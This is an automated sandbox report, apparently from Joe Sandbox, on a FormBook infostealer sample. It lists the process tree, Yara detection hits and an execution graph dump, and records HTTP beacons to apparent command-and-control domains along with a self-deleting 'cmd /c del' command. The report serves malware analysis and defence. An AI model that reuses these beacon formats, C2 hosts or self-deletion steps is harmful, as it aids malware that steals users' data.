          Aug 7, 2024 12:47:40.376432896 CEST | 154 | OUT | GET /jd21/?4h6=+5nsDbzeU2p9U7f/EDv04YNxDKhKydlr4qi/vE56uC3vG/MRVEljVAr+s/LnjHWqip0u&tT=MHNp HTTP/1.1
          Host: www.00050591.xyz
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          1 | 192.168.2.4 | 49738 | 66.235.200.145 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 7, 2024 12:48:00.674156904 CEST | 171 | OUT | GET /jd21/?4h6=TcnzKU037ptQb8KtMr1qWerDm92/juweqwVgTbR+hogZZVjE2Gm2LVJlLe3KP85noDUE&tT=MHNp HTTP/1.1
          Host: www.californiacurrentelectric.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Target ID:0
          Start time:06:46:59
          Start date:07/08/2024
          Path:C:\Users\user\Desktop\8t1uarSZFV.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\8t1uarSZFV.exe"
          Imagebase:0xfa0000
          File size:1'118'208 bytes
          MD5 hash:14876F2AECBF08493108D81F260BFE7A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:06:47:00
          Start date:07/08/2024
          Path:C:\Windows\SysWOW64\svchost.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\8t1uarSZFV.exe"
          Imagebase:0xf90000
          File size:46'504 bytes
          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:06:47:02
          Start date:07/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff72b770000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:3
          Start time:06:47:04
          Start date:07/08/2024
          Path:C:\Windows\SysWOW64\netsh.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\netsh.exe"
          Imagebase:0x1560000
          File size:82'432 bytes
          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:false

          Target ID:4
          Start time:06:47:07
          Start date:07/08/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
          Imagebase:0x240000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:06:47:07
          Start date:07/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7699e0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

            Execution Graph

            Execution Coverage:3.4%
            Dynamic/Decrypted Code Coverage:0.4%
            Signature Coverage:3%
            Total number of Nodes:2000
            Total number of Limit Nodes:68
39 API calls 95868->95937 95870 fb17b0 95869->95870 95871 fb1376 95869->95871 96194 fc0242 5 API calls __Init_thread_wait 95870->96194 95873 ff6331 95871->95873 95941 fb1940 95871->95941 96199 102709c 256 API calls 95873->96199 95874 fb17ba 95877 fb17fb 95874->95877 95880 fa9cb3 22 API calls 95874->95880 95883 ff6346 95877->95883 95885 fb182c 95877->95885 95878 ff633d 95878->95850 95889 fb17d4 95880->95889 95881 fb1940 9 API calls 95882 fb13b6 95881->95882 95882->95877 95884 fb13ec 95882->95884 96200 101359c 82 API calls __wsopen_s 95883->96200 95884->95883 95890 fb1408 __fread_nolock 95884->95890 96196 faaceb 23 API calls ISource 95885->96196 95888 fb1839 96197 fbd217 256 API calls 95888->96197 96195 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95889->96195 95890->95888 95893 ff636e 95890->95893 95899 fbfddb 22 API calls 95890->95899 95902 fbfe0b 22 API calls 95890->95902 95910 fb152f 95890->95910 95911 fb15c7 ISource 95890->95911 95912 ff63b2 95890->95912 95951 faec40 95890->95951 96201 101359c 82 API calls __wsopen_s 95893->96201 95895 fb153c 95898 fb1940 9 API calls 95895->95898 95896 ff63d1 96203 1025745 54 API calls _wcslen 95896->96203 95901 fb1549 95898->95901 95899->95890 95900 fb1872 95900->95873 96198 fbfaeb 23 API calls 95900->96198 95903 fb1940 9 API calls 95901->95903 95901->95911 95902->95890 95909 fb1563 95903->95909 95904 fb171d 95904->95850 95908 fb167b ISource 95908->95904 96193 fbce17 22 API calls ISource 95908->96193 95909->95911 95916 faa8c7 22 API calls 95909->95916 95910->95895 95910->95896 95911->95900 95911->95908 95914 fb1940 9 API calls 95911->95914 95975 102958b 95911->95975 95978 1016ef1 95911->95978 96058 fa4f39 95911->96058 96064 fbeffa 95911->96064 96121 101744a 95911->96121 96178 101f0ec 95911->96178 96187 102959f 95911->96187 96190 100d4ce 95911->96190 96204 101359c 82 API calls __wsopen_s 95911->96204 96202 101359c 82 API calls __wsopen_s 95912->96202 95914->95911 95916->95911 95925->95850 95926->95824 
95927->95829 95928->95847 95930 faa8db 95929->95930 95932 faa8ea __fread_nolock 95929->95932 95931 fbfe0b 22 API calls 95930->95931 95930->95932 95931->95932 95932->95847 95933->95847 95934->95847 95935->95832 95936->95847 95937->95868 95938->95866 95939->95864 95940->95859 95942 fb1981 95941->95942 95946 fb195d 95941->95946 96205 fc0242 5 API calls __Init_thread_wait 95942->96205 95945 fb198b 95945->95946 96206 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95945->96206 95950 fb13a0 95946->95950 96207 fc0242 5 API calls __Init_thread_wait 95946->96207 95947 fb8727 95947->95950 96208 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95947->96208 95950->95881 95954 faec76 ISource 95951->95954 95952 fbfddb 22 API calls 95952->95954 95953 fc0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95953->95954 95954->95952 95954->95953 95955 ff4beb 95954->95955 95956 fb06a0 41 API calls 95954->95956 95958 ff4b0b 95954->95958 95959 faa8c7 22 API calls 95954->95959 95960 faf3ae ISource 95954->95960 95961 fafef7 95954->95961 95962 ff4600 95954->95962 95968 fafbe3 95954->95968 95969 faa961 22 API calls 95954->95969 95970 faed9d ISource 95954->95970 95972 fc00a3 29 API calls pre_c_initialization 95954->95972 95974 fc01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95954->95974 96209 fb01e0 256 API calls 2 library calls 95954->96209 96213 101359c 82 API calls __wsopen_s 95955->96213 95956->95954 96211 101359c 82 API calls __wsopen_s 95958->96211 95959->95954 95960->95970 96210 101359c 82 API calls __wsopen_s 95960->96210 95965 faa8c7 22 API calls 95961->95965 95961->95970 95967 faa8c7 22 API calls 95962->95967 95962->95970 95965->95970 95967->95970 95968->95960 95968->95970 95971 ff4bdc 95968->95971 95969->95954 95970->95890 96212 101359c 82 API calls __wsopen_s 95971->96212 95972->95954 95974->95954 96214 1027f59 95975->96214 95977 102959b 
95977->95911 95979 faa961 22 API calls 95978->95979 95980 1016f1d 95979->95980 95981 faa961 22 API calls 95980->95981 95982 1016f26 95981->95982 95983 1016f3a 95982->95983 96532 fab567 95982->96532 95985 fa7510 53 API calls 95983->95985 95990 1016f57 _wcslen 95985->95990 95986 1016fbc 95988 fa7510 53 API calls 95986->95988 95987 10170bf 96347 fa4ecb 95987->96347 95991 1016fc8 95988->95991 95990->95986 95990->95987 95999 10170e9 95990->95999 95996 faa8c7 22 API calls 95991->95996 96001 1016fdb 95991->96001 95993 10170e5 95995 faa961 22 API calls 95993->95995 95993->95999 95994 fa4ecb 94 API calls 95994->95993 95997 101711a 95995->95997 95996->96001 95998 faa961 22 API calls 95997->95998 96004 1017126 95998->96004 95999->95911 96000 1017027 96003 fa7510 53 API calls 96000->96003 96001->96000 96002 1017005 96001->96002 96005 faa8c7 22 API calls 96001->96005 96006 fa33c6 22 API calls 96002->96006 96007 1017034 96003->96007 96008 faa961 22 API calls 96004->96008 96005->96002 96009 101700f 96006->96009 96010 1017047 96007->96010 96011 101703d 96007->96011 96012 101712f 96008->96012 96013 fa7510 53 API calls 96009->96013 96537 100e199 GetFileAttributesW 96010->96537 96014 faa8c7 22 API calls 96011->96014 96016 faa961 22 API calls 96012->96016 96018 101701b 96013->96018 96014->96010 96017 1017138 96016->96017 96021 fa7510 53 API calls 96017->96021 96022 fa6350 22 API calls 96018->96022 96019 1017050 96020 1017063 96019->96020 96023 fa4c6d 22 API calls 96019->96023 96025 fa7510 53 API calls 96020->96025 96031 1017069 96020->96031 96024 1017145 96021->96024 96022->96000 96023->96020 96369 fa525f 96024->96369 96027 10170a0 96025->96027 96538 100d076 57 API calls 96027->96538 96028 1017166 96411 fa4c6d 96028->96411 96031->95999 96033 10171a9 96035 faa8c7 22 API calls 96033->96035 96034 fa4c6d 22 API calls 96037 1017186 96034->96037 96036 10171ba 96035->96036 96414 fa6350 96036->96414 96037->96033 96040 fa6b57 22 API calls 96037->96040 96042 101719b 96040->96042 96041 fa6350 22 
API calls 96043 10171d6 96041->96043 96044 fa6b57 22 API calls 96042->96044 96045 fa6350 22 API calls 96043->96045 96044->96033 96046 10171e4 96045->96046 96047 fa7510 53 API calls 96046->96047 96048 10171f0 96047->96048 96423 100d7bc 96048->96423 96050 1017201 96051 100d4ce 4 API calls 96050->96051 96052 101720b 96051->96052 96053 fa7510 53 API calls 96052->96053 96056 1017239 96052->96056 96054 1017229 96053->96054 96477 1012947 96054->96477 96057 fa4f39 68 API calls 96056->96057 96057->95999 96059 fa4f4a 96058->96059 96060 fa4f43 96058->96060 96062 fa4f6a FreeLibrary 96059->96062 96063 fa4f59 96059->96063 96061 fce678 67 API calls 96060->96061 96061->96059 96062->96063 96063->95911 97173 fa9c6e 96064->97173 96068 fbfddb 22 API calls 96069 fbf02b 96068->96069 96070 fbfe0b 22 API calls 96069->96070 96072 fbf03c 96070->96072 96071 fff0a8 96111 fbf0a4 96071->96111 97243 1019caa 39 API calls 96071->97243 97211 fa6246 96072->97211 96075 fab567 39 API calls 96077 fff10a 96075->96077 96076 faa961 22 API calls 96078 fbf04f 96076->96078 96079 fbf0b1 96077->96079 96080 fff112 96077->96080 96081 fa6246 CloseHandle 96078->96081 97187 fbfa5b 96079->97187 96083 fab567 39 API calls 96080->96083 96084 fbf056 96081->96084 96086 fbf0b8 96083->96086 96085 fa7510 53 API calls 96084->96085 96087 fbf062 96085->96087 96090 fff127 96086->96090 96091 fbf0d3 96086->96091 96088 fa6246 CloseHandle 96087->96088 96089 fbf06c 96088->96089 97215 fa5745 96089->97215 96094 fbfe0b 22 API calls 96090->96094 97192 fa6270 96091->97192 96097 fff12c 96094->96097 96098 fff140 96097->96098 97244 fbf866 ReadFile SetFilePointerEx 96097->97244 96110 fff144 __fread_nolock 96098->96110 97245 1010e85 22 API calls ___scrt_fastfail 96098->97245 96099 fbf085 97223 fa53de 96099->97223 96100 fff0a0 97242 fa6216 CloseHandle ISource 96100->97242 96102 fbf0ea 96102->96110 97239 fa62b5 22 API calls 96102->97239 96108 fbf093 97238 fa53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96108->97238 96111->96075 
96111->96079 96112 fbf0fe 96115 fbf138 96112->96115 96116 fa6246 CloseHandle 96112->96116 96113 fff069 97241 100ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96113->97241 96114 fbf09a 96114->96111 96114->96113 96115->95911 96118 fbf12c 96116->96118 96118->96115 97240 fa6216 CloseHandle ISource 96118->97240 96119 fff080 96119->96111 96122 1017469 96121->96122 96123 1017474 96121->96123 96124 fab567 39 API calls 96122->96124 96127 faa961 22 API calls 96123->96127 96160 1017554 96123->96160 96124->96123 96125 fbfddb 22 API calls 96126 1017587 96125->96126 96128 fbfe0b 22 API calls 96126->96128 96129 1017495 96127->96129 96130 1017598 96128->96130 96131 faa961 22 API calls 96129->96131 96133 fa6246 CloseHandle 96130->96133 96132 101749e 96131->96132 96134 fa7510 53 API calls 96132->96134 96135 10175a3 96133->96135 96136 10174aa 96134->96136 96137 faa961 22 API calls 96135->96137 96138 fa525f 22 API calls 96136->96138 96139 10175ab 96137->96139 96140 10174bf 96138->96140 96141 fa6246 CloseHandle 96139->96141 96142 fa6350 22 API calls 96140->96142 96143 10175b2 96141->96143 96144 10174f2 96142->96144 96145 fa7510 53 API calls 96143->96145 96146 101754a 96144->96146 96148 100d4ce 4 API calls 96144->96148 96147 10175be 96145->96147 96150 fab567 39 API calls 96146->96150 96149 fa6246 CloseHandle 96147->96149 96151 1017502 96148->96151 96152 10175c8 96149->96152 96150->96160 96151->96146 96153 1017506 96151->96153 96154 fa5745 5 API calls 96152->96154 96155 fa9cb3 22 API calls 96153->96155 96156 10175e2 96154->96156 96157 1017513 96155->96157 96158 10175ea 96156->96158 96159 10176de GetLastError 96156->96159 97289 100d2c1 26 API calls 96157->97289 96164 fa53de 27 API calls 96158->96164 96162 10176f7 96159->96162 96160->96125 96177 10176a4 96160->96177 97293 fa6216 CloseHandle ISource 96162->97293 96163 101751c 96163->96146 96166 10175f8 96164->96166 97290 fa53c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96166->97290 96168 1017645 96169 fbfddb 22 
API calls 96168->96169 96172 1017679 96169->96172 96170 10175ff 96170->96168 96171 1017619 96170->96171 97291 100ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 96171->97291 96174 faa961 22 API calls 96172->96174 96175 1017686 96174->96175 96175->96177 97292 100417d 22 API calls __fread_nolock 96175->97292 96177->95911 96179 fa7510 53 API calls 96178->96179 96180 101f126 96179->96180 97294 fa9e90 96180->97294 96182 101f136 96183 faec40 256 API calls 96182->96183 96184 101f15b 96182->96184 96183->96184 96185 fa9c6e 22 API calls 96184->96185 96186 101f15f 96184->96186 96185->96186 96186->95911 96188 1027f59 120 API calls 96187->96188 96189 10295af 96188->96189 96189->95911 97331 100dbbe lstrlenW 96190->97331 96193->95908 96194->95874 96195->95877 96196->95888 96197->95900 96198->95900 96199->95878 96200->95911 96201->95911 96202->95911 96203->95909 96204->95911 96205->95945 96206->95946 96207->95947 96208->95950 96209->95954 96210->95970 96211->95970 96212->95955 96213->95970 96252 fa7510 96214->96252 96218 1028281 96219 102844f 96218->96219 96223 102828f 96218->96223 96316 1028ee4 60 API calls 96219->96316 96222 102845e 96222->96223 96224 102846a 96222->96224 96288 1027e86 96223->96288 96241 1027fd5 ISource 96224->96241 96225 fa7510 53 API calls 96243 1028049 96225->96243 96230 10282c8 96303 fbfc70 96230->96303 96233 1028302 96310 fa63eb 22 API calls 96233->96310 96234 10282e8 96309 101359c 82 API calls __wsopen_s 96234->96309 96237 10282f3 GetCurrentProcess TerminateProcess 96237->96233 96238 1028311 96311 fa6a50 22 API calls 96238->96311 96240 102832a 96251 1028352 96240->96251 96312 fb04f0 22 API calls 96240->96312 96241->95977 96243->96218 96243->96225 96243->96241 96307 100417d 22 API calls __fread_nolock 96243->96307 96308 102851d 42 API calls _strftime 96243->96308 96244 10284c5 96244->96241 96247 10284d9 FreeLibrary 96244->96247 96245 1028341 96313 1028b7b 75 API calls 96245->96313 96247->96241 96251->96244 96314 fb04f0 22 API calls 
96251->96314 96315 faaceb 23 API calls ISource 96251->96315 96317 1028b7b 75 API calls 96251->96317 96253 fa7522 96252->96253 96254 fa7525 96252->96254 96253->96241 96275 1028cd3 96253->96275 96255 fa755b 96254->96255 96256 fa752d 96254->96256 96257 fe50f6 96255->96257 96259 fa756d 96255->96259 96267 fe500f 96255->96267 96318 fc51c6 26 API calls 96256->96318 96321 fc5183 26 API calls 96257->96321 96319 fbfb21 51 API calls 96259->96319 96260 fa753d 96265 fbfddb 22 API calls 96260->96265 96263 fe510e 96263->96263 96268 fa7547 96265->96268 96266 fe5088 96320 fbfb21 51 API calls 96266->96320 96267->96266 96270 fbfe0b 22 API calls 96267->96270 96269 fa9cb3 22 API calls 96268->96269 96269->96253 96271 fe5058 96270->96271 96272 fbfddb 22 API calls 96271->96272 96273 fe507f 96272->96273 96274 fa9cb3 22 API calls 96273->96274 96274->96266 96276 faaec9 22 API calls 96275->96276 96277 1028cee CharLowerBuffW 96276->96277 96322 1008e54 96277->96322 96281 faa961 22 API calls 96282 1028d2a 96281->96282 96329 fa6d25 96282->96329 96284 1028d3e 96285 fa93b2 22 API calls 96284->96285 96287 1028d48 _wcslen 96285->96287 96286 1028e5e _wcslen 96286->96243 96287->96286 96342 102851d 42 API calls _strftime 96287->96342 96289 1027ea1 96288->96289 96290 1027eec 96288->96290 96291 fbfe0b 22 API calls 96289->96291 96294 1029096 96290->96294 96292 1027ec3 96291->96292 96292->96290 96293 fbfddb 22 API calls 96292->96293 96293->96292 96295 10292ab ISource 96294->96295 96302 10290ba _strcat _wcslen 96294->96302 96295->96230 96296 fab567 39 API calls 96296->96302 96297 fab38f 39 API calls 96297->96302 96298 fab6b5 39 API calls 96298->96302 96299 fa7510 53 API calls 96299->96302 96300 fcea0c 21 API calls ___std_exception_copy 96300->96302 96302->96295 96302->96296 96302->96297 96302->96298 96302->96299 96302->96300 96346 100efae 24 API calls _wcslen 96302->96346 96305 fbfc85 96303->96305 96304 fbfd1d VirtualAlloc 96306 fbfceb 96304->96306 96305->96304 96305->96306 96306->96233 96306->96234 
96307->96243 96308->96243 96309->96237 96310->96238 96311->96240 96312->96245 96313->96251 96314->96251 96315->96251 96316->96222 96317->96251 96318->96260 96319->96260 96320->96257 96321->96263 96323 1008e74 _wcslen 96322->96323 96324 1008f68 96323->96324 96325 1008ea9 96323->96325 96326 1008f63 96323->96326 96324->96326 96344 fbce60 41 API calls 96324->96344 96325->96326 96343 fbce60 41 API calls 96325->96343 96326->96281 96326->96287 96330 fa6d91 96329->96330 96331 fa6d34 96329->96331 96332 fa93b2 22 API calls 96330->96332 96331->96330 96333 fa6d3f 96331->96333 96339 fa6d62 __fread_nolock 96332->96339 96334 fa6d5a 96333->96334 96335 fe4c9d 96333->96335 96345 fa6f34 22 API calls 96334->96345 96336 fbfddb 22 API calls 96335->96336 96338 fe4ca7 96336->96338 96340 fbfe0b 22 API calls 96338->96340 96339->96284 96341 fe4cda 96340->96341 96342->96286 96343->96325 96344->96324 96345->96339 96346->96302 96539 fa4e90 LoadLibraryA 96347->96539 96352 fe3ccf 96354 fa4f39 68 API calls 96352->96354 96353 fa4ef6 LoadLibraryExW 96547 fa4e59 LoadLibraryA 96353->96547 96356 fe3cd6 96354->96356 96358 fa4e59 3 API calls 96356->96358 96362 fe3cde 96358->96362 96360 fa4f20 96361 fa4f2c 96360->96361 96360->96362 96363 fa4f39 68 API calls 96361->96363 96569 fa50f5 96362->96569 96365 fa4f31 96363->96365 96365->95993 96365->95994 96368 fe3d05 96370 faa961 22 API calls 96369->96370 96371 fa5275 96370->96371 96372 faa961 22 API calls 96371->96372 96373 fa527d 96372->96373 96374 faa961 22 API calls 96373->96374 96375 fa5285 96374->96375 96376 faa961 22 API calls 96375->96376 96377 fa528d 96376->96377 96378 fe3df5 96377->96378 96379 fa52c1 96377->96379 96381 faa8c7 22 API calls 96378->96381 96380 fa6d25 22 API calls 96379->96380 96382 fa52cf 96380->96382 96383 fe3dfe 96381->96383 96385 fa93b2 22 API calls 96382->96385 96384 faa6c3 22 API calls 96383->96384 96387 fa5304 96384->96387 96386 fa52d9 96385->96386 96386->96387 96388 fa6d25 22 API calls 96386->96388 96389 fa5349 96387->96389 96390 
fa5325 96387->96390 96406 fe3e20 96387->96406 96392 fa52fa 96388->96392 96391 fa6d25 22 API calls 96389->96391 96390->96389 96395 fa4c6d 22 API calls 96390->96395 96393 fa535a 96391->96393 96394 fa93b2 22 API calls 96392->96394 96396 fa5370 96393->96396 96401 faa8c7 22 API calls 96393->96401 96394->96387 96397 fa5332 96395->96397 96399 fa5384 96396->96399 96403 faa8c7 22 API calls 96396->96403 96397->96389 96402 fa6d25 22 API calls 96397->96402 96398 fa6b57 22 API calls 96408 fe3ee0 96398->96408 96400 fa538f 96399->96400 96404 faa8c7 22 API calls 96399->96404 96405 faa8c7 22 API calls 96400->96405 96409 fa539a 96400->96409 96401->96396 96402->96389 96403->96399 96404->96400 96405->96409 96406->96398 96407 fa4c6d 22 API calls 96407->96408 96408->96389 96408->96407 96818 fa49bd 22 API calls __fread_nolock 96408->96818 96409->96028 96412 faaec9 22 API calls 96411->96412 96413 fa4c78 96412->96413 96413->96033 96413->96034 96415 fa6362 96414->96415 96416 fe4a51 96414->96416 96819 fa6373 96415->96819 96829 fa4a88 22 API calls __fread_nolock 96416->96829 96419 fa636e 96419->96041 96420 fe4a5b 96421 fe4a67 96420->96421 96422 faa8c7 22 API calls 96420->96422 96422->96421 96424 100d7d8 96423->96424 96425 100d7f3 96424->96425 96426 100d7dd 96424->96426 96427 faa961 22 API calls 96425->96427 96428 faa8c7 22 API calls 96426->96428 96476 100d7ee 96426->96476 96429 100d7fb 96427->96429 96428->96476 96430 faa961 22 API calls 96429->96430 96431 100d803 96430->96431 96432 faa961 22 API calls 96431->96432 96433 100d80e 96432->96433 96434 faa961 22 API calls 96433->96434 96435 100d816 96434->96435 96436 faa961 22 API calls 96435->96436 96437 100d81e 96436->96437 96438 faa961 22 API calls 96437->96438 96439 100d826 96438->96439 96440 faa961 22 API calls 96439->96440 96441 100d82e 96440->96441 96442 faa961 22 API calls 96441->96442 96443 100d836 96442->96443 96444 fa525f 22 API calls 96443->96444 96445 100d84d 96444->96445 96446 fa525f 22 API calls 96445->96446 96447 100d866 
96446->96447 96448 fa4c6d 22 API calls 96447->96448 96449 100d872 96448->96449 96450 100d885 96449->96450 96452 fa93b2 22 API calls 96449->96452 96451 fa4c6d 22 API calls 96450->96451 96453 100d88e 96451->96453 96452->96450 96454 100d89e 96453->96454 96455 fa93b2 22 API calls 96453->96455 96456 100d8b0 96454->96456 96457 faa8c7 22 API calls 96454->96457 96455->96454 96458 fa6350 22 API calls 96456->96458 96457->96456 96459 100d8bb 96458->96459 96830 100d978 22 API calls 96459->96830 96461 100d8ca 96831 100d978 22 API calls 96461->96831 96463 100d8dd 96464 fa4c6d 22 API calls 96463->96464 96465 100d8e7 96464->96465 96466 100d8ec 96465->96466 96467 100d8fe 96465->96467 96468 fa33c6 22 API calls 96466->96468 96469 fa4c6d 22 API calls 96467->96469 96470 100d8f9 96468->96470 96471 100d907 96469->96471 96474 fa6350 22 API calls 96470->96474 96472 100d925 96471->96472 96473 fa33c6 22 API calls 96471->96473 96475 fa6350 22 API calls 96472->96475 96473->96470 96474->96472 96475->96476 96476->96050 96478 1012954 __wsopen_s 96477->96478 96479 fbfe0b 22 API calls 